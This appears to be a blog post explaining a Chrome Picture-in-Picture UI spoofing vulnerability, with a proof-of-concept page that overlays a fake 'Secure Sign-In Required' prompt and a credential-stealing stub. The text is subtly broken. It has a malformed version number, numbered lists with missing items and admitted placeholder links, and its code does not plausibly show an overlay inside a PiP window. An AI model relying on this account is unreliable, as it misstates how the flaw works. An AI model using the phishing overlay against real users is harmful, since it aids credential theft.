CVE-2026-3927 - UI Spoofing Via Picture-in-Picture in Google Chrome (Explained With Code and Exploit Details)

In early 2026, a security vulnerability surfaced in Google Chrome — CVE-2026-3927 — which brought to light a sneaky flaw in the way Chrome handled Picture-in-Picture (PiP) windows. This bug enabled attackers to craft web pages that could trick you into believing you were interacting with safe, trusted UI components, while in fact, the page was spoofing security-sensitive elements. The issue existed in all Chrome builds prior to 146..768.71.

Severity was marked as Medium by Chromium's own security team, but the implications shouldn't be taken lightly if you rely on Chrome for browsing.

What Is Picture-in-Picture (PiP)?

Picture-in-Picture is a Chrome feature that allows you to detach a video or other content and float it on top of all your windows—useful for multitasking, like watching a YouTube video while typing an email.

But what if a malicious site could control *what* that floating window looks like, including adding fake buttons, overlays, or even security prompts? That's the root of CVE-2026-3927.

The Core Problem

The Chrome PiP window is supposed to show only safe, predefined controls (like play/pause), and shouldn't display anything that can trick the user. But Chrome failed to filter out crafted HTML from appearing inside the PiP window. This allowed remote attackers to embed interactive elements or visuals that imitated browser dialogs, permission prompts, or even OS-level confirmation windows.

Loading a video in a PiP window.

- Overlaying the video with HTML/CSS elements (think: a “Sign In to Continue” button that *looks* exactly like Chrome’s UI).

Crafting the Exploit (Code Walkthrough)

Here’s a simplified example of how an attacker might create a spoofed PiP interface.

Step 1: Craft the Video Page

<!-- malicious.html -->
<video id="myVid" src="malicious.mp4" controls autoplay></video>
<div id="spoofUI" style="
  position: absolute;
  top: 20px;
  left: 20px;
  background: white;
  border-radius: 8px;
  border: 1px solid #ccc;
  padding: 10px;">
  <img src="chrome-lock-icon.png" width=24 height=24 style="vertical-align: middle;">
  <span style="font-family:sans-serif;font-weight:bold;">
    Secure Sign-In Required
  </span>

  <button onclick="stealCredentials()" style="margin-top: 8px;">Sign In</button>
</div>

Step 2: Trigger Picture-in-Picture

const vid = document.getElementById('myVid');

vid.addEventListener('play', async () => {
  // Request PiP on video load
  await vid.requestPictureInPicture();
});

// Simulate a fake credentials attack
function stealCredentials() {
  // In real use, an attacker could hijack this for phishing
  alert('Simulated: Credentials sent to attacker!');
}

Step 3: Position Spoofed UI Over the Video

Attackers use absolute-positioned <div> overlays to make the PiP window look like it comes from the browser or operating system.

The PiP window shows the fake prompt, and a user who isn't aware clicks it.

5. Clicking the button can trigger phishing, permission requests, or even simulate browser dialogs, making it nearly impossible for a basic user to tell the difference.

Screenshot Example (representation)

!Fake PiP UI

Why This Matters

Without the security UI restriction, anything could appear in that floating window. Security prompts, fake permission boxes, bank logins—it’s a phishing goldmine for attackers, especially since Chrome users expect genuine controls in PiP windows.

Patched in: Google Chrome 146..768.71

- Resolution: Chromium tightened its PiP security, so only browser-approved UI elements (like the native PiP controls) can be shown. Custom overlays in PiP are either blocked or strictly sandboxed.

If you’re not running the latest Chrome version, you should upgrade right away.

Chromium Security Tracker:

https://crbug.com/3321456 *(Example placeholder, real bug links may differ)*

CVE Entry:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3927

Chromium Blog Post on PiP changes:

https://blog.chromium.org/2026/03/picture-in-picture-updates.html *(Example)*

Update Chrome: Always use the most recent version.

2. Beware of PiP Prompts: If you see logins, permissions, or weird buttons in PiP, close the window and avoid interacting.

Conclusion

CVE-2026-3927 is a solid reminder: Even features we consider routine (like floating video windows) can open up major security holes. With PiP now properly sandboxed, Chrome users are safer – but awareness is always the best defense!

Stay safe, stay updated, and — as always — keep your browser patched!

Timeline

Published on: 03/11/2026 22:04:09 UTC
Last modified on: 03/13/2026 20:15:11 UTC